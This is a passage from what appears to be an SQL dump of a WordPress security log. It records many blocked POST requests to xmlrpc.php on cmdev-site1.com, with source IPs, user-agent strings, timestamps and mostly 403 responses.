Firefox\\/67.0\"}','orNucCjeR7YOfQ5ybkmEtFhI',0,1681306410.6936,573,'','POST',403,0,515,0,1,'',0),('45.76.163.93',759997277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','VnWMHL4vt5jNgAXbGSzFyIir',0,1681308986.8564,1311,'','POST',403,0,515,0,1,'',0),('23.235.195.123',401326971,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','seIAkDPy0fVJjqigF5CWwbSR',0,1681310868.6336,724,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','lcS5gKr2EBM0dVehvtmpknUA',0,1681310870.1425,576,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','ITEUv9yRCZx5HO0Sjp37AGeX',0,1681310872.4930,569,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','bTYeDG4vt9wfVg6oFjhNyA3m',0,1681310877.5858,599,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','5aDSBL6WfYiF9MTK0cpyNZs7',0,1681310880.8219,585,'','POST',403,0,515,0,1,'',0),('54.36.131.250',908362746,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','QE67mR1rJA9ipTCgvsxul5YS',0,1681310888.3154,677,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','lc2GjrCzOV5FYaJWpTfNBbso',0,1681310897.4622,1009,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','cAnpNuze5HUO2Jylsx4q96TI',0,1681310897.9620,965,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','DYx39LgP8ApeamIERFBqhoKH',0,1681310906.8603,593,'','POST',403,0,515,0,1,'',0),('31.220.74.65',534530625,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','08p4Pm2XKYWtju5owJhHOq6A',0,1681313664.1732,1509,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','KT9rbPU0jyhJnDvm7EFcs2YL',0,1681313679.2495,1493,'','POST',403,0,515,0,1,'',0),('213.136.93.169',3582483881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','MGXhrduTyI4UWF1LfqP7Ev9C',0,1681315342.7086,640,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','EeU5r7C8vnaiYQ4NK2TIsO0b',0,1681315351.5578,600,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','kMFVOnAZviQI3UoJfX1Lds08',0,1681315355.1968,649,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','VhDHueIl63jXqMWxKvTJo8gc',0,1681317304.3185,3365,'','POST',403,0,515,0,1,'',0),('173.201.189.178',2915679666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','zq8j3KYAkmLcQvueSlDVXp6B',0,1681317311.9186,654,'','POST',403,0,515,0,1,'',0),('15.235.15.195',267063235,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','DFQ3qUoXa8kr0fw6EpBOgyPj',0,1681317327.2893,858,'','POST',403,0,515,0,1,'',0),('192.99.18.63',3227718207,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','zmfYt7BcVWNjvM68LiyZF0q3',0,1681317331.1775,628,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','6mKtM4oO39UxAZqI1L2D8WFi',0,1681317333.5609,601,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','blqx6BpTmh2PnifVyZL0Fc7N',0,1681317336.7600,601,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','6NO7o0MEDlGx1sIBApLUu32W',0,1681317350.9504,806,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','61TlW9cP0UY8Seu3Royntid4',0,1681318686.6300,3766,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PR3Yy2uwbMKghNQlWIrvA1ct',0,1681318688.4671,1945,'','POST',403,0,515,0,1,'',0),('182.50.132.117',3056764021,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Fbkuz725rD0GOh9C6gXxZ3RU',0,1681318693.5462,2122,'','POST',403,0,515,0,1,'',0),('198.50.254.114',3325230706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','8HUvYGXidmKTc7fr1PnOCLkN',0,1681318694.3409,2211,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','FVYpHs3CuQ4agInGqTX07Ovo',0,1681318698.1713,2572,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','3KsHVelwUh2y0ISnqzDP6TiQ',0,1681318708.7408,5000,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','MlmpybVt1F7LEvuQsDhOqwYX',0,1681318709.7562,5195,'','POST',403,0,515,0,1,'',0),('173.201.191.100',2915680100,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','kOjN72PeD5WEMtU4ZS9XYqon',0,1681318718.9584,1485,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','m34gEfxMID60lhBP78nSZi51',0,1681318720.1418,882,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','LoUS4BynluOjp7NPbwJas02A',0,1681318726.6400,558,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','HbGB15zF4rEOdfn0XjaVCS3I',0,1681323877.3791,582,'','POST',403,0,515,0,1,'',0),('103.74.119.218',1732933594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','06PJCkqTyjcF1b2wdnOm3uLW',0,1681323878.4608,597,'','POST',403,0,515,0,1,'',0),('173.201.191.100',2915680100,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','plTuoYOkfSZMKgaht8bjsezQ',0,1681323885.4312,623,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','n6kQ7X2EaDiorJOZmeydWB5u',0,1681325621.6088,3349,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','f6RVzZqEi7Ilj540kMOw8NSm',0,1681325622.1586,3611,'','POST',403,0,515,0,1,'',0),('67.227.167.13',1138992909,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','qDRiAbO3Q0zF1mM4cnkHryIG',0,1681325624.9720,1480,'','POST',403,0,515,0,1,'',0),('3.231.146.243',65508083,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','bhmBrgDP8OIGM7KNz5y2Vfk1',0,1681325630.2425,606,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','atq2M7JGSpAdgmczn6hOuC5K',0,1681325645.7857,553,'','POST',403,0,515,0,1,'',0),('89.46.108.191',1496214719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','BbsJmOvZ0hU7Q1gqVIXPljKG',0,1681325649.2546,558,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','eur91txwDcpfKOAlzvonYFS7',0,1681325654.2031,609,'','POST',403,0,515,0,1,'',0),('178.159.49.228',2996777444,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','CknMtzyWDpPwEmf6lSQU7A3J',0,1681325658.2605,570,'','POST',403,0,515,0,1,'',0),('15.207.212.141',265278605,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','kT9x5FtulwMi8rOqGJz3YjE0',0,1681325667.0454,577,'','POST',403,0,515,0,1,'',0),('199.16.128.59',3339747387,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','s9cL8U1BgfieFzYpv3Z7Q4u6',0,1681325673.3838,608,'','POST',403,0,515,0,1,'',0),('68.178.151.138',1152554890,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','h2mB7rSNd5RjaLtZ9KEAbgci',0,1681327120.7413,600,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','oRmsQaKi8XBLS4On1hTFAk70',0,1681329354.6241,4545,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','t9zMxlYETnHGeuW5dDA8qBh3',0,1681329358.3509,2197,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','GiZeoWmkwT7nD2H0shByzMC3',0,1681329367.3117,1772,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Z8hwiJlj5DzsX9U1GSNHVrda',0,1681329370.3667,2378,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','ezIEAKXDpblT58HotyYqUNVF',0,1681329384.0292,631,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NeB6wTLiVlv1gcPt8z7oGXpF',0,1681329392.5072,568,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','TcwuzHMynWOdSNU3m2XJRvq9',0,1681329403.6253,646,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','uiyJdBFSbzIZWsa0xGpVLwCR',0,1681331777.0714,3396,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','QplUu5tsD8gm7Tv6XZJBP3Lk',0,1681331777.5041,3618,'','POST',403,0,515,0,1,'',0),('185.61.152.50',3107821618,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','trPskz3ySHNaCObc7gAKFu9n',0,1681331784.3048,659,'','POST',403,0,515,0,1,'',0),('41.222.211.123',702468987,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','Ngj9IiVHDTsCFypKLOuAZtGa',0,1681331788.9981,550,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','TZonsAEu2DxUNtVQGzlcbhpW',0,1681331799.2231,576,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','HFE43BJgYd8A5Cj9epXR1uqf',0,1681331811.1199,581,'','POST',403,0,515,0,1,'',0),('51.79.204.217',860867801,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','G87QsymiYtxHq4AKbj5VZlvn',0,1681331811.8632,594,'','POST',403,0,515,0,1,'',0),('68.178.151.138',1152554890,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H3So2tbkF7m4BcdVyfRrznCp',0,1681331816.8810,624,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZHpmPRqevhlCx3sWg8y6IDwk',0,1681337130.6782,653,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','pdnu91LYjRazhP7wcM6UC8xA',0,1681337142.1200,555,'','POST',403,0,515,0,1,'',0),('192.96.200.110',3227568238,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','TSpbV6UaDR2d5hHIlmGFJ0cj',0,1681337147.9109,554,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','j1miVHGvUIQLDzelpC3Ru9Xq',0,1681337343.8208,4001,'','POST',403,0,515,0,1,'',0),('135.181.33.187',2276794811,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','KU3YANg4W861TaRs7yHecMvE',0,1681337344.8110,3012,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','wmgJIQGOoBsLDtxAh6a51kCF',0,1681337360.3856,553,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','x9thaKMgyPNTGLHOBr5p2z8n',0,1681337363.9673,550,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','9YKSp2PoUEZ3vt8ebGhlXrNV',0,1681337369.2808,570,'','POST',403,0,515,0,1,'',0),('200.58.111.20',3359272724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','M0g46cdCB71QfYHP8a9xswTS',0,1681337372.7464,572,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','7i1WmxpElHC3sjaNkFQ4tYMd',0,1681337374.6785,590,'','POST',403,0,515,0,1,'',0),('162.214.115.185',2731963321,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','VnYOsjk9eDqM1ig3hoI0wRB6',0,1681337382.0225,587,'','POST',403,0,515,0,1,'',0),('185.119.88.55',3111606327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','hnAeDpvF4dUfTxrtqLCjiJbE',0,1681338155.8081,4490,'','POST',403,0,515,0,1,'',0),('91.206.201.230',1540278758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','k8WUGfc2PzBImoehHJKRNbrv',0,1681338155.6742,5433,'','POST',403,0,515,0,1,'',0),('139.59.62.4',2335915524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','tbv6OIyXPVqTsBZGlAwFHu9g',0,1681338168.0492,1296,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','XFS6pyLGP2TctmfibjHDrRwM',0,1681341052.1524,570,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','LhaS3yYKE7bPZOdX1vH4qktG',0,1681341083.2089,2168,'','POST',403,0,515,0,1,'',0),('103.255.237.2',1744825602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','ZDFm1g04hefKNMzsAiw5Gcju',0,1681343711.6729,3792,'','POST',403,0,515,0,1,'',0),('95.111.252.99',1601174627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','YMFrpVROLGClc58T29XyxaNZ',0,1681343718.6287,557,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','VNS2FBumeLY7fAaMITh5dHKt',0,1681343724.1013,565,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','qcMJh8jAYk9bzmelsOtZpwHW',0,1681343733.3806,395,'','POST',404,0,515,0,1,'',0),('134.122.42.249',2256153337,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','rciBG8DOJoWU1IVgz3SnfFLh',0,1681343734.4607,1294,'','POST',403,0,515,0,1,'',0),('81.88.52.221',1364735197,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 